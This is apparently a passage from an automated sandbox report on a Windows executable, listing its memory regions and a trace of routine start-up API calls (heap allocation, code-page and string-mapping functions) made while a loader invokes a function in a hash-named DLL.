"LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16922 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16923 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16924 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 16925 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 16926 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 16927 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 16928 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 16929 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 16930 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 16931 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 16932 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16934 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 16935 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16936 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16937 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16938 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 16939 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16940 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16941 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16942 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 16943 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 16944 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16945 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 16946 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 16947 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 16948 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 16949 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 16950 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 16951 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16952 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16953 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 16954 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 16955 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 16956 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 16957 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 16958 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 16959 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16960 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 16961 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16962 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 16963 start_va = 0xa70000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 16964 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 16965 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 16966 start_va = 0x1e70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 16967 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 16968 start_va = 0x1e70000 end_va = 0x1f2ffff monitored = 0 entry_point = 0x1e90da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 16969 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 16970 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 16971 start_va = 0x1f70000 end_va = 0x206ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 16972 start_va = 0x2070000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 16973 start_va = 0x2270000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 16974 start_va = 0x2670000 end_va = 0x2e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 16978 start_va = 0x2e70000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Thread: id = 233 os_tid = 0x484 [0288.318] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.319] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0288.320] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.320] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0288.320] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0288.320] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.320] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0288.321] GetProcessHeap () returned 0x550000 [0288.321] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.321] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0288.321] GetLastError () returned 0x7e [0288.321] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0288.321] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0288.322] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c8) returned 0x563b10 [0288.322] SetLastError (dwErrCode=0x7e) [0288.322] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1200) returned 0x563ee0 [0288.324] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0288.324] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0288.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0288.324] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0288.324] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" [0288.324] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_alloc" [0288.324] GetACP () returned 0x4e4 [0288.324] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x228) returned 0x554f20 [0288.324] IsValidCodePage (CodePage=0x4e4) returned 1 [0288.324] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0288.325] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0288.325] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.325] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0288.325] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0288.325] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.325] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0288.325] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0288.325] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0288.325] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0288.325] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0288.326] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f 